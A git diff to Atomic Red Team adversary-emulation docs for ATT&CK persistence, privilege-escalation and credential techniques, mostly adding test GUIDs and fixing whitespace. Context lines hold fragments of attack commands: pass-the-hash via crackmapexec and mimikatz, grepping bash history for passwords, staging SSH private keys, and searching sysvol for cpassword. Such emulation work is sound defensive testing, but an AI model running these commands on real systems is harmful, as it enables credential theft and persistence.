@@ -33,10 +33,14 @@ Upon successful execution, powershell will modify the registry and swap osk.exe
**Supported Platforms:** Windows
+**auto_generated_guid:** 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| parent_list | Comma separated list of system binaries to which you want to attach each #{attached_process}. Default: "osk.exe" | String | osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, atbroker.exe|
| attached_process | Full path to process to attach to target in #{parent_list}. Default: cmd.exe | Path | C:\windows\system32\cmd.exe|
@@ -87,6 +91,10 @@ Replace sticky keys binary (sethc.exe) with cmd.exe
**Supported Platforms:** Windows
+**auto_generated_guid:** 934e90cf-29ca-48b3-863c-411737ad44e3
+
+
+
diff --git a/atomics/T1546.010/T1546.010.md b/atomics/T1546.010/T1546.010.md
index d0d2cd8b..75e6ea29 100644
--- a/atomics/T1546.010/T1546.010.md
+++ b/atomics/T1546.010/T1546.010.md
@@ -17,15 +17,21 @@ The AppInit DLL functionality is disabled in Windows 8 and later versions when s
AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded into each user mode process on the system. Upon succesfully execution,
you will see the message "The operation completed successfully." Each time the DLL is loaded, you will see a message box with a message of "Install AppInit Shim DLL was called!" appear.
This will happen regularly as your computer starts up various applications and may in fact drive you crazy. A reliable way to make the message box appear and verify the
-AppInit Dlls are loading is to start the notepad application. Be sure to run the cleanup commands afterwards so you don't keep getting message boxes showing up
+AppInit Dlls are loading is to start the notepad application. Be sure to run the cleanup commands afterwards so you don't keep getting message boxes showing up.
+
+Note: If secure boot is enabled, this technique will not work. https://docs.microsoft.com/en-us/windows/win32/dlls/secure-boot-and-appinit-dlls
**Supported Platforms:** Windows
+**auto_generated_guid:** a58d9386-3080-4242-ab5f-454c16503d18
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| registry_file | Windows Registry File | Path | PathToAtomicsFolder\T1546.010\src\T1546.010.reg|
| registry_cleanup_file | Windows Registry File | Path | PathToAtomicsFolder\T1546.010\src\T1546.010-cleanup.reg|
@@ -49,7 +55,7 @@ reg.exe import #{registry_cleanup_file} >nul 2>&1
##### Description: Reg files must exist on disk at specified locations (#{registry_file} and #{registry_cleanup_file})
##### Check Prereq Commands:
```powershell
-if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file})) {exit 0} else {exit 1}
+if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file})) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -61,7 +67,7 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
##### Description: DLL's must exist in the C:\Tools directory (T1546.010.dll and T1546.010x86.dll)
##### Check Prereq Commands:
```powershell
-if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll)) {exit 0} else {exit 1}
+if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll)) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1546.010/T1546.010.yaml b/atomics/T1546.010/T1546.010.yaml
index acaa9658..f5e70f99 100644
--- a/atomics/T1546.010/T1546.010.yaml
+++ b/atomics/T1546.010/T1546.010.yaml
@@ -7,7 +7,9 @@ atomic_tests:
AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded into each user mode process on the system. Upon succesfully execution,
you will see the message "The operation completed successfully." Each time the DLL is loaded, you will see a message box with a message of "Install AppInit Shim DLL was called!" appear.
This will happen regularly as your computer starts up various applications and may in fact drive you crazy. A reliable way to make the message box appear and verify the
- AppInit Dlls are loading is to start the notepad application. Be sure to run the cleanup commands afterwards so you don't keep getting message boxes showing up
+ AppInit Dlls are loading is to start the notepad application. Be sure to run the cleanup commands afterwards so you don't keep getting message boxes showing up.
+
+ Note: If secure boot is enabled, this technique will not work. https://docs.microsoft.com/en-us/windows/win32/dlls/secure-boot-and-appinit-dlls
supported_platforms:
- windows
input_arguments:
diff --git a/atomics/T1546.011/T1546.011.md b/atomics/T1546.011/T1546.011.md
index d04659d0..d24eac95 100644
--- a/atomics/T1546.011/T1546.011.md
+++ b/atomics/T1546.011/T1546.011.md
@@ -39,10 +39,14 @@ the source code files is the \\T1546.011\\src directory.
**Supported Platforms:** Windows
+**auto_generated_guid:** 9ab27e22-ee62-4211-962b-d36d9a0e6a18
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_path | Path to the shim database file | String | PathToAtomicsFolder\T1546.011\bin\AtomicShimx86.sdb|
@@ -65,7 +69,7 @@ sdbinst.exe -u #{file_path} >nul 2>&1
##### Description: Shim database file must exist on disk at specified location (#{file_path})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{file_path}) {exit 0} else {exit 1}
+if (Test-Path #{file_path}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -76,7 +80,7 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
##### Description: AtomicTest.dll must exist at c:\Tools\AtomicTest.dll
##### Check Prereq Commands:
```powershell
-if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit 1}
+if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -98,6 +102,10 @@ https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persist
**Supported Platforms:** Windows
+**auto_generated_guid:** aefd6866-d753-431f-a7a4-215ca7e3f13d
+
+
+
@@ -131,6 +139,10 @@ https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persist
**Supported Platforms:** Windows
+**auto_generated_guid:** 9b6a06f9-ab5e-4e8d-8289-1df4289db02f
+
+
+
diff --git a/atomics/T1546.012/T1546.012.md b/atomics/T1546.012/T1546.012.md
index 0387c735..b9ab7202 100644
--- a/atomics/T1546.012/T1546.012.md
+++ b/atomics/T1546.012/T1546.012.md
@@ -27,10 +27,14 @@ Leverage Global Flags Settings
**Supported Platforms:** Windows
+**auto_generated_guid:** fdda2626-5234-4c90-b163-60849a24c0b8
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_binary | Binary To Attach To | Path | C:\Windows\System32\calc.exe|
| payload_binary | Binary To Execute | Path | C:\Windows\System32\cmd.exe|
@@ -61,10 +65,14 @@ Leverage Global Flags Settings
**Supported Platforms:** Windows
+**auto_generated_guid:** 46b1f278-c8ee-4aa5-acce-65e77b11f3c1
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_binary | Binary To Attach To | Path | C:\Windows\System32\notepad.exe|
| payload_binary | Binary To Execute | Path | C:\Windows\System32\cmd.exe|
diff --git a/atomics/T1546.013/T1546.013.md b/atomics/T1546.013/T1546.013.md
index ddd23f09..dadf2820 100644
--- a/atomics/T1546.013/T1546.013.md
+++ b/atomics/T1546.013/T1546.013.md
@@ -21,10 +21,14 @@ Appends a start process cmdlet to the current user's powershell profile pofile t
**Supported Platforms:** Windows
+**auto_generated_guid:** 090e5aa5-32b6-473b-a49b-21e843a56896
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| exe_path | Path the malicious executable | Path | calc.exe|
| ps_profile | Powershell profile to use | String | $profile|
@@ -51,7 +55,7 @@ Set-Content $profile -Value $oldprofile
##### Description: Ensure a powershell profile exists for the current user
##### Check Prereq Commands:
```powershell
-if (Test-Path #{ps_profile}) {exit 0} else {exit 1}
+if (Test-Path #{ps_profile}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1546.014/T1546.014.md b/atomics/T1546.014/T1546.014.md
index 1e5dbb49..bb146717 100644
--- a/atomics/T1546.014/T1546.014.md
+++ b/atomics/T1546.014/T1546.014.md
@@ -19,10 +19,14 @@ Establish persistence via a rule run by OSX's emond (Event Monitor) daemon at st
**Supported Platforms:** macOS
+**auto_generated_guid:** 23c9c127-322b-4c75-95ca-eff464906114
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| plist | Path to attacker emond plist file | path | PathToAtomicsFolder/T1546.014/src/T1546.014_emond.plist|
diff --git a/atomics/T1547.001/T1547.001.md b/atomics/T1547.001/T1547.001.md
index 3df5043a..8db87797 100644
--- a/atomics/T1547.001/T1547.001.md
+++ b/atomics/T1547.001/T1547.001.md
@@ -67,10 +67,14 @@ Upon successful execution, cmd.exe will modify the registry by adding \"Atomic R
**Supported Platforms:** Windows
+**auto_generated_guid:** e55be3fd-3521-4610-9d1a-e210e42dcf05
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| command_to_execute | Thing to Run | Path | C:\Path\AtomicRedTeam.exe|
@@ -102,10 +106,14 @@ Upon successful execution, cmd.exe will modify the registry to load AtomicRedTea
**Supported Platforms:** Windows
+**auto_generated_guid:** 554cbd88-cde1-4b56-8168-0be552eed9eb
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| thing_to_execute | Thing to Run | Path | C:\Path\AtomicRedTeam.dll|
@@ -136,10 +144,14 @@ Upon successful execution, a new entry will be added to the runonce item in the
**Supported Platforms:** Windows
+**auto_generated_guid:** eb44f842-0457-4ddc-9b92-c4caa144ac42
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| thing_to_execute | Thing to Run | Path | powershell.exe|
| reg_key_path | Path to registry key to update | Path | HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce|
@@ -173,6 +185,10 @@ folder and will also run when the computer is restarted and the user logs in.
**Supported Platforms:** Windows
+**auto_generated_guid:** 2cb98256-625e-4da9-9d44-f2e5f90b8bd5
+
+
+
@@ -208,6 +224,10 @@ folder and will also run when the computer is restarted and the user logs in.
**Supported Platforms:** Windows
+**auto_generated_guid:** dade9447-791e-4c8f-b04b-3a35855dfa06
+
+
+
@@ -242,6 +262,10 @@ folder and will also run when the computer is restarted and the user logs in.
**Supported Platforms:** Windows
+**auto_generated_guid:** 5b6768e4-44d2-44f0-89da-a01d1430fd5e
+
+
+
@@ -274,6 +298,10 @@ Adds a non-malicious executable shortcut link to the current users startup direc
**Supported Platforms:** Windows
+**auto_generated_guid:** 24e55612-85f6-4bd6-ae74-a73d02e3441d
+
+
+
diff --git a/atomics/T1547.004/T1547.004.md b/atomics/T1547.004/T1547.004.md
index 5fe2f423..da6f3b0d 100644
--- a/atomics/T1547.004/T1547.004.md
+++ b/atomics/T1547.004/T1547.004.md
@@ -29,10 +29,14 @@ Upon successful execution, PowerShell will modify a registry value to execute cm
**Supported Platforms:** Windows
+**auto_generated_guid:** bf9f9d65-ee4d-4c3e-a843-777d04f19c38
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| binary_to_execute | Path of binary to execute | Path | C:\Windows\System32\cmd.exe|
@@ -64,10 +68,14 @@ Upon successful execution, PowerShell will modify a registry value to execute cm
**Supported Platforms:** Windows
+**auto_generated_guid:** fb32c935-ee2e-454b-8fa3-1c46b42e8dfb
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| binary_to_execute | Path of binary to execute | Path | C:\Windows\System32\cmd.exe|
@@ -99,10 +107,14 @@ Upon successful execution, PowerShell will modify a registry value to execute at
**Supported Platforms:** Windows
+**auto_generated_guid:** d40da266-e073-4e5a-bb8b-2b385023e5f9
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| binary_to_execute | Path of notification package to execute | Path | C:\Windows\Temp\atomicNotificationPackage.dll|
diff --git a/atomics/T1547.005/T1547.005.md b/atomics/T1547.005/T1547.005.md
index 3b89b849..92db61ec 100644
--- a/atomics/T1547.005/T1547.005.md
+++ b/atomics/T1547.005/T1547.005.md
@@ -17,10 +17,14 @@ Add a value to a Windows registry SSP key, simulating an adversarial modificatio
**Supported Platforms:** Windows
+**auto_generated_guid:** afdfd7e3-8a0b-409f-85f7-886fdf249c9e
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| fake_ssp_dll | Value added to registry key. Normally refers to a DLL name in C:\Windows\System32. | String | not-a-ssp|
diff --git a/atomics/T1547.006/T1547.006.md b/atomics/T1547.006/T1547.006.md
index cff18b2b..ca56ae7e 100644
--- a/atomics/T1547.006/T1547.006.md
+++ b/atomics/T1547.006/T1547.006.md
@@ -21,10 +21,14 @@ This test uses the insmod command to load a kernel module for Linux.
**Supported Platforms:** Linux
+**auto_generated_guid:** 687dcb93-9656-4853-9c36-9977315e9d23
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| module_name | Name of the kernel module name. | string | T1547006|
| module_path | Folder used to store the module. | path | /tmp/T1547.006/T1547006.ko|
@@ -51,7 +55,7 @@ sudo rmmod #{module_name}
##### Description: The kernel module must exist on disk at specified location
##### Check Prereq Commands:
```bash
-if [ -f #{module_path} ]; then exit 0; else exit 1; fi;
+if [ -f #{module_path} ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
```bash
diff --git a/atomics/T1547.007/T1547.007.md b/atomics/T1547.007/T1547.007.md
index 42a377fa..bbda29b0 100644
--- a/atomics/T1547.007/T1547.007.md
+++ b/atomics/T1547.007/T1547.007.md
@@ -21,6 +21,10 @@ Plist Method
**Supported Platforms:** macOS
+**auto_generated_guid:** 5fefd767-ef54-4ac6-84d3-751ab85e8aba
+
+
+
#### Run it with these steps!
@@ -49,10 +53,14 @@ Mac Defaults
**Supported Platforms:** macOS
+**auto_generated_guid:** 5f5b71da-e03f-42e7-ac98-d63f9e0465cb
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| script | path to script | path | /path/to/script|
diff --git a/atomics/T1547.009/T1547.009.md b/atomics/T1547.009/T1547.009.md
index c2f26034..3e405cac 100644
--- a/atomics/T1547.009/T1547.009.md
+++ b/atomics/T1547.009/T1547.009.md
@@ -21,10 +21,14 @@ Upon execution, calc.exe will be launched.
**Supported Platforms:** Windows
+**auto_generated_guid:** ce4fc678-364f-4282-af16-2fb4c78005ce
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| shortcut_file_path | shortcut modified and execute | path | %temp%\T1547.009_modified_shortcut.url|
@@ -57,6 +61,10 @@ to view the new shortcut.
**Supported Platforms:** Windows
+**auto_generated_guid:** cfdc954d-4bb0-4027-875b-a1893ce406f2
+
+
+
diff --git a/atomics/T1547.010/T1547.010.md b/atomics/T1547.010/T1547.010.md
index 60ed62c2..4af13b5c 100644
--- a/atomics/T1547.010/T1547.010.md
+++ b/atomics/T1547.010/T1547.010.md
@@ -24,10 +24,14 @@ Add key-value pair to a Windows Port Monitor registry. On the subsequent reboot
**Supported Platforms:** Windows
+**auto_generated_guid:** d34ef297-f178-4462-871e-9ce618d44e50
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| monitor_dll | Addition to port monitor registry key. Normally refers to a DLL name in C:\Windows\System32. arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL. | Path | C:\Path\AtomicRedTeam.dll|
diff --git a/atomics/T1547.011/T1547.011.md b/atomics/T1547.011/T1547.011.md
index e18c5b40..f39ea804 100644
--- a/atomics/T1547.011/T1547.011.md
+++ b/atomics/T1547.011/T1547.011.md
@@ -19,6 +19,10 @@ Modify MacOS plist file in one of two directories
**Supported Platforms:** macOS
+**auto_generated_guid:** 394a538e-09bb-4a4a-95d1-b93cf12682a8
+
+
+
#### Run it with these steps!
diff --git a/atomics/T1548.001/T1548.001.md b/atomics/T1548.001/T1548.001.md
index 5cee87b3..7286cc60 100644
--- a/atomics/T1548.001/T1548.001.md
+++ b/atomics/T1548.001/T1548.001.md
@@ -23,10 +23,14 @@ Make, change owner, and change file attributes on a C source code file
**Supported Platforms:** macOS, Linux
+**auto_generated_guid:** 896dfe97-ae43-4101-8e96-9a7996555d80
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| payload | hello.c payload | path | PathToAtomicsFolder/T1548.001/src/hello.c|
@@ -62,10 +66,14 @@ This test sets the SetUID flag on a file in Linux and macOS.
**Supported Platforms:** macOS, Linux
+**auto_generated_guid:** 759055b3-3885-4582-a8ec-c00c9d64dd79
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_to_setuid | Path of file to set SetUID flag | path | /tmp/evilBinary|
@@ -97,10 +105,14 @@ This test sets the SetGID flag on a file in Linux and macOS.
**Supported Platforms:** macOS, Linux
+**auto_generated_guid:** db55f666-7cba-46c6-9fe6-205a05c3242c
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_to_setuid | Path of file to set SetGID flag | path | /tmp/evilBinary|
diff --git a/atomics/T1548.002/T1548.002.md b/atomics/T1548.002/T1548.002.md
index 597dc756..81999488 100644
--- a/atomics/T1548.002/T1548.002.md
+++ b/atomics/T1548.002/T1548.002.md
@@ -40,10 +40,14 @@ Upon execution command prompt should be launched with administrative privelages
**Supported Platforms:** Windows
+**auto_generated_guid:** 5073adf8-9a50-4bd9-b298-a9bd2ead8af9
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe|
@@ -75,10 +79,14 @@ Upon execution command prompt should be launched with administrative privelages
**Supported Platforms:** Windows
+**auto_generated_guid:** a6ce9acf-842a-4af6-8f79-539be7608e2b
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe|
@@ -111,10 +119,14 @@ Upon execution, "The operation completed successfully." will be shown twice and
**Supported Platforms:** Windows
+**auto_generated_guid:** 58f641ea-12e3-499a-b684-44dee46bd182
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe|
@@ -147,10 +159,14 @@ Upon execution command prompt will be opened.
**Supported Platforms:** Windows
+**auto_generated_guid:** 3f627297-6c38-4e7d-a278-fc2563eaaeaa
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe|
@@ -184,10 +200,14 @@ Upon execution administrative command prompt should open
**Supported Platforms:** Windows
+**auto_generated_guid:** 3c51abf2-44bf-42d8-9111-dc96ff66750f
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe|
@@ -221,10 +241,14 @@ Upon execution the directory structure should exist if the system is patched, if
**Supported Platforms:** Windows
+**auto_generated_guid:** f7a35090-6f7f-4f64-bb47-d657bf5b10c1
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe|
@@ -260,10 +284,14 @@ Adapted from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal
**Supported Platforms:** Windows
+**auto_generated_guid:** 3be891eb-4608-4173-87e8-78b494c029b7
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| command.to.execute | Command to execute | string | cmd.exe /c notepad.exe|
@@ -297,6 +325,10 @@ HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA from 1
**Supported Platforms:** Windows
+**auto_generated_guid:** 9e8af564-53ec-407e-aaa8-3cb20c3af7f9
+
+
+
@@ -335,10 +367,14 @@ REM will tell it to ignore everything after %windir% and treat it just as a NOTE
**Supported Platforms:** Windows
+**auto_generated_guid:** 28104f8a-4ff1-4582-bcf6-699dce156608
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_path | Path to the bat file | String | PathToAtomicsFolder\T1548.002\src\T1548.002.bat|
diff --git a/atomics/T1548.003/T1548.003.md b/atomics/T1548.003/T1548.003.md
index dc2d0842..7e3aeca4 100644
--- a/atomics/T1548.003/T1548.003.md
+++ b/atomics/T1548.003/T1548.003.md
@@ -27,6 +27,10 @@ Common Sudo enumeration methods.
**Supported Platforms:** macOS, Linux
+**auto_generated_guid:** 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e
+
+
+
@@ -53,6 +57,10 @@ Sets sudo caching timestamp_timeout to a value for unlimited. This is dangerous
**Supported Platforms:** macOS, Linux
+**auto_generated_guid:** a7b17659-dd5e-46f7-b7d1-e6792c91d0bc
+
+
+
@@ -78,6 +86,10 @@ Sets sudo caching tty_tickets value to disabled. This is dangerous to modify wit
**Supported Platforms:** macOS, Linux
+**auto_generated_guid:** 91a60b03-fb75-4d24-a42e-2eb8956e8de1
+
+
+
diff --git a/atomics/T1550.002/T1550.002.md b/atomics/T1550.002/T1550.002.md
index 3b5dc5f3..d0fc6f04 100644
--- a/atomics/T1550.002/T1550.002.md
+++ b/atomics/T1550.002/T1550.002.md
@@ -22,10 +22,14 @@ Note: must dump hashes first
**Supported Platforms:** Windows
+**auto_generated_guid:** ec23cef9-27d9-46e4-a68d-6f75f7b86908
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | username | string | Administrator|
| ntlm | ntlm hash | string | cc36cf7a8514893efccd3324464tkg1a|
@@ -48,7 +52,7 @@ Note: must dump hashes first
##### Check Prereq Commands:
```powershell
$mimikatz_path = cmd /c echo #{mimikatz_path}
-if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
+if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -71,10 +75,14 @@ command execute with crackmapexec
**Supported Platforms:** Windows
+**auto_generated_guid:** eb05b028-16c8-4ad8-adea-6f5b219da9a9
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | username | string | Administrator|
| crackmapexec_exe | crackmapexec windows executable | Path | C:\CrackMapExecWin\crackmapexec.exe|
@@ -97,7 +105,7 @@ crackmapexec #{domain} -u #{user_name} -H #{ntlm} -x #{command}
##### Description: CrackMapExec executor must exist on disk at specified location (#{crackmapexec_exe})
##### Check Prereq Commands:
```powershell
-if(Test-Path #{crackmapexec_exe}) { 0 } else { -1 }
+if(Test-Path #{crackmapexec_exe}) { 0 } else { -1 }
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1550.003/T1550.003.md b/atomics/T1550.003/T1550.003.md
index 8c4fc94d..b7dff150 100644
--- a/atomics/T1550.003/T1550.003.md
+++ b/atomics/T1550.003/T1550.003.md
@@ -23,10 +23,14 @@ Similar to PTH, but attacking Kerberos
**Supported Platforms:** Windows
+**auto_generated_guid:** dbf38128-7ba7-4776-bedf-cc2eed432098
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | username | string | Administrator|
| domain | domain | string | atomic.local|
@@ -47,7 +51,7 @@ Similar to PTH, but attacking Kerberos
##### Description: Mimikatz must exist on disk at specified location (#{mimikatz_exe})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
+if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1552.001/T1552.001.md b/atomics/T1552.001/T1552.001.md
index 33589071..6761c411 100644
--- a/atomics/T1552.001/T1552.001.md
+++ b/atomics/T1552.001/T1552.001.md
@@ -27,6 +27,10 @@ In cloud and/or containerized environments, authenticated user and service accou
**Supported Platforms:** macOS
+**auto_generated_guid:** 9e507bb8-1d30-4e3b-a49b-cb5727d7ea79
+
+
+
@@ -51,10 +55,14 @@ Extracting credentials from files
**Supported Platforms:** macOS, Linux
+**auto_generated_guid:** bd4cf0d1-7646-474e-8610-78ccf5a097c4
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_path | Path to search | String | /|
@@ -80,6 +88,10 @@ Extracting Credentials from Files. Upon execution, the contents of files that co
**Supported Platforms:** Windows
+**auto_generated_guid:** 0e56bf29-ff49-4ea5-9af4-3b81283fd513
+
+
+
@@ -106,6 +118,10 @@ If these files exist, their contents will be displayed. They are used to store c
**Supported Platforms:** Windows
+**auto_generated_guid:** 367d4004-5fc0-446d-823f-960c74ae52c3
+
+
+
@@ -131,6 +147,10 @@ This test looks for .netrc files (which stores github credentials in clear text
**Supported Platforms:** macOS, Linux
+**auto_generated_guid:** da4f751a-020b-40d7-b9ff-d433b7799803
+
+
+
diff --git a/atomics/T1552.002/T1552.002.md b/atomics/T1552.002/T1552.002.md
index ceefc502..a4fb96e6 100644
--- a/atomics/T1552.002/T1552.002.md
+++ b/atomics/T1552.002/T1552.002.md
@@ -22,6 +22,10 @@ Queries to enumerate for credentials in the Registry. Upon execution, any regist
**Supported Platforms:** Windows
+**auto_generated_guid:** b6ec082c-7384-46b3-a111-9a9b8b14e5e7
+
+
+
@@ -48,6 +52,10 @@ entries are found, they will be displayed.
**Supported Platforms:** Windows
+**auto_generated_guid:** af197fd7-e868-448e-9bd5-05d1bcd9d9e5
+
+
+
diff --git a/atomics/T1552.003/T1552.003.md b/atomics/T1552.003/T1552.003.md
index 61a5049e..ff2377b5 100644
--- a/atomics/T1552.003/T1552.003.md
+++ b/atomics/T1552.003/T1552.003.md
@@ -15,10 +15,14 @@ Search through bash history for specifice commands we want to capture
**Supported Platforms:** Linux, macOS
+**auto_generated_guid:** 3cfde62b-7c33-4b26-a61e-755d6131c8ce
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | ~/loot.txt|
| bash_history_grep_args | grep arguments that filter out specific commands we want to capture | Path | -e '-p ' -e 'pass' -e 'ssh'|
diff --git a/atomics/T1552.004/T1552.004.md b/atomics/T1552.004/T1552.004.md
index d9eb8d26..8780b653 100644
--- a/atomics/T1552.004/T1552.004.md
+++ b/atomics/T1552.004/T1552.004.md
@@ -28,6 +28,10 @@ File extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, pfx, .cer, .p7b, .
**Supported Platforms:** Windows
+**auto_generated_guid:** 520ce462-7ca7-441e-b5a5-f8347f632696
+
+
+
@@ -52,10 +56,14 @@ Discover private SSH keys on a macOS or Linux system.
**Supported Platforms:** macOS, Linux
+**auto_generated_guid:** 46959285-906d-40fa-9437-5a439accd878
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| search_path | Path where to start searching from. | path | /|
| output_file | Output file containing locations of SSH key files | path | /tmp/keyfile_locations.txt|
@@ -87,10 +95,14 @@ Copy private SSH keys on a Linux system to a staging folder using the `cp` comma
**Supported Platforms:** Linux
+**auto_generated_guid:** 7c247dc7-5128-4643-907b-73a76d9135c3
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| search_path | Path where to start searching from. | path | /|
| output_folder | Output folder containing copies of SSH private key files | path | /tmp/art-staging|
@@ -123,10 +135,14 @@ Copy private SSH keys on a Linux or macOS system to a staging folder using the `
**Supported Platforms:** macOS, Linux
+**auto_generated_guid:** 864bb0b2-6bb5-489a-b43b-a77b3a16d68a
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| search_path | Path where to start searching from. | path | /|
| output_folder | Output folder containing copies of SSH private key files | path | /tmp/art-staging|
diff --git a/atomics/T1552.006/T1552.006.md b/atomics/T1552.006/T1552.006.md
index 1fea602a..718e21a9 100644
--- a/atomics/T1552.006/T1552.006.md
+++ b/atomics/T1552.006/T1552.006.md
@@ -28,6 +28,10 @@ Look for the encrypted cpassword value within Group Policy Preference files on t
**Supported Platforms:** Windows
+**auto_generated_guid:** 870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f
+
+
+
@@ -45,7 +49,7 @@ findstr /S cpassword %logonserver%\sysvol\*.xml
##### Description: Computer must be domain joined
##### Check Prereq Commands:
```powershell
